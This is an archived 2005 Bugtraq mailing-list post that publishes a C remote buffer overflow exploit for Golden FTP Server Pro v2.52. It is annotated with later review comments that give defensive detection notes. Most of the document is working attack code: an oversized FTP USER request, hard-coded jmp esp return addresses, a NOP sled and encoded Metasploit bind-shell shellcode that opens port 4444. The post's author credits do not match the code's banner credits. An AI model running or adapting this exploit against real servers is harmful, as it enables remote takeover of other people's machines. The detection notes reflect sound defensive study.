Date: Sat, 30 Apr 2005 15:03:17 +0000
From: "mohamed amhemed" <rodhedor@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Golden FTP Server Pro Remote Buffer Overflow Exploit


Golden FTP Server Pro Remote Buffer Overflow Exploit
Bug Discovered by rod hedor (http://lezr.com)
Exploit coded By lezr hack
Web: lezr.com
E-Mail: rodhedor@...mail.com
Usage:exploit <targetOs> <targetIp>

/

/

Vulnerable Versions:
Golden FTP Server Pro v2.52

Exploit:
Run the exploit against the server. Afterward, right-click
on the Golden FTP Server Pro icon in the Windows tray and click
Statistic.
The overflow is triggered at that point, when the Statistic view is opened
on the server, and it will open a bind shell on port 4444.

/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

/*
 * First part of the request: the FTP "USER " verb followed by a few hundred
 * 'A' filler bytes. There is no CRLF here; main() appends more bytes before
 * the line is terminated.
 *
 * Detection note: no legitimate FTP user name comes close to this length, so
 * a maximum-length rule on the USER argument (at the server, a proxy or an
 * IDS) rejects this request regardless of what follows the filler.
 */
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/*
 * Table of 4-byte values, one per supported target, that main() appends
 * directly after the filler in userreq. The author's comments label them as
 * "jmp esp" addresses for English Windows XP SP1 and SP2. main() indexes the
 * table with atoi(argv[1]) - 1 and does no range check on that index.
 *
 * NOTE(review): the values are presumably specific to those OS builds, which
 * would explain why the tool asks for a target number; the page does not say
 * which module they point into.
 */
char *target[]=  //return addr
{
       "\xFC\x18\xD7\x77",   //WinXp Sp1 Eng - jmp esp addr
       "\xBF\xAC\xDA\x77"    //WinXp Sp2 Eng - jmp esp addr
};

/*
 * Opaque payload bytes appended after the NOP run. The author's header
 * describes the blob as generated by Metasploit (http://metasploit.com):
 *   win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub
 * The bytes are encoded, so the listing itself shows no readable strings;
 * that header is the only description of the payload on the page.
 *
 * Detection note: the effect claimed by the post is a new TCP listener on
 * port 4444 on the FTP server host. An FTP server process that opens an
 * unexpected listening socket, and inbound connections to 4444/tcp, are the
 * host and network signals to alert on.
 */
char shellcode[] =
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";

/*
 * 24 bytes of 0x90 (the x86 NOP opcode). main() places them between the
 * value taken from target[] and the payload.
 *
 * Detection note: a run of 0x90 bytes has no place in an FTP control
 * channel, which carries printable command text; it is a long-standing
 * IDS indicator for this class of request.
 */
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";

/*
 * FTP PASS command with an empty password, sent in the same buffer right
 * after the oversized USER line to complete the login attempt.
 */
char passreq[] =
"PASS \r\n";

/*
 * Entry point of the proof-of-concept, reproduced as archived (including the
 * mail line-wrapping inside some string literals and one statement).
 *
 * What the code does: it concatenates userreq, one entry of target[], nops,
 * shellcode, CRLF and passreq into a single heap buffer, resolves the host
 * named in argv[2], connects to TCP port 21, reads the server greeting once
 * and sends the whole buffer with one send() call.
 *
 * Defender's view: the only traffic produced is a single FTP login attempt
 * whose USER line is several hundred bytes long and contains non-printable
 * bytes. Limiting the length of FTP command lines and rejecting non-text
 * bytes on the control channel covers it without matching payload bytes.
 * According to the text of the post, the affected version is Golden FTP
 * Server Pro v2.52 and the overflow fires later, when the Statistic view is
 * opened on the server.
 *
 * NOTE(review): the usage banner below credits different people than the
 * header of the e-mail; the page does not explain the discrepancy, so the
 * provenance of the code is unclear.
 */
void main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in 	sock;
        SOCKET mysocket;
        char rec[1024];

        // Fewer than two arguments: print the banner and usage text, then exit.
        if (argc < 3)
        {
                printf("\r\nGolden FTP Server Pro Remote Buffer Overflow 
Exploit\r\n",argv[0]);
                printf("Bug Discovered by Reed Arvin 
(http://reedarvin.thearvins.com)\r\n");
                printf("Exploit coded By ATmaCA\r\n");
                printf("Web: atmacasoft.com && spyinstructors.com\r\n");
                printf("Credit to kozan and metasploit\r\n");
                printf("Usage:\r\nexploit <targetOs> 
<targetIp>\r\n\r\n",argv[0]);
                printf("Targets:\n");
                printf("1 - WinXP SP1 english\n");
                printf("2 - WinXP SP2 english\n");
                printf("Example:exploit 2 127.0.0.1\n");

                return;
       }
       // 1-based target number from the command line becomes a 0-based index
       // into target[]; the value is not range-checked.
       int targetnum = atoi(argv[1]) - 1;

       // One heap buffer sized from the four arrays plus 7 spare bytes; the
       // malloc() result is used without a NULL check.
       char *evilbuf = 
(char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
                                +sizeof(passreq)+7);
       // Request layout as assembled here: "USER " + filler, 4-byte target
       // value, NOP run, payload, CRLF, then "PASS " CRLF.
       strcpy(evilbuf,userreq);
       strcat(evilbuf,target[targetnum]);
       strcat(evilbuf,nops);
       strcat(evilbuf,shellcode);
       strcat(evilbuf,"\r\n");
       strcat(evilbuf,passreq);
       //printf("%s",evilbuf);

       // Winsock 1.1 is requested.
       wVersionRequested = MAKEWORD(1, 1);
       if (WSAStartup(wVersionRequested, &wsaData) < 0) return;



       mysocket = socket(AF_INET, SOCK_STREAM, 0);
       if(mysocket==INVALID_SOCKET){
                  printf("Socket error!\r\n");
                  exit(1);
       }

       // argv[2] is resolved with gethostbyname(); the failure message below
       // prints argv[1] instead.
       printf("Resolving Hostnames...\n");
       if ((pTarget = gethostbyname(argv[2])) == NULL){
                  printf("Resolve of %s failed\n", argv[1]);
                  exit(1);
       }

       // Destination is the FTP control port (21) on the resolved address.
       memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
       sock.sin_family = AF_INET;
       sock.sin_port = htons(21);

       printf("Connecting...\n");
       if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                  printf("Couldn't connect to host.\n");
                  exit(1);
       }

       // The greeting is read once after a 10 ms pause; the recv() result and
       // the received bytes are not examined.
       printf("Connected!...\n");
       printf("Waiting for welcome message...\n");
       Sleep(10);
       recv(mysocket,rec,1024,0);

       // Length comes from strlen() plus one, so the terminating NUL byte is
       // sent as well. Both FTP commands leave in this single send().
       printf("Sending evil request...\n");
       if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
                  printf("Error Sending evil request.\r\n");
                  closesocket(mysocket);
                  exit(1);
       }

       // "Success." only means send() did not fail; no server reply is read
       // and nothing here checks the state of the server.
       Sleep(10);
       printf("Success.\n");
       closesocket(mysocket);
       WSACleanup();
}
// راندفو  انت  ح ث ا؛؛؛ ل ة
